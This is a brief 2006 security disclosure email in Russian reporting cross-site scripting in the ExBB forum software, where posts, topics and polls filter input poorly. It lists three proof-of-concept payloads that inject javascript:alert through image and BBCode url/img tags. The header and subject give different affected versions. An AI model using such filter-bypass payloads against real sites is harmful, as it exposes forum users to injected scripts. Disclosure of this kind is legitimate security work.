Извиняюсь ExBB <=1.9.1 XSS vuln.
From: KeVRter [mailto:[email protected]]
Sent: Monday, May 01, 2006 7:53 PM
To: ' ([email protected])'
Subject: ExBB <=1.1 XSS vuln.
Cross Site Scripting
При добавлении сообщения/темы/голосования осуществляется не достаточная
фильтрация входных данных:
Примеры: XSS<image/src=javascript:alert('XSS')>
[url=http://ya.ru:>XSS</a><image/src=javascript:alert('XSS')><a][/url]
[img]XSS<image/src=javascript:alert('XSS')>[/img]
Email: [email protected]
ICQ: 294308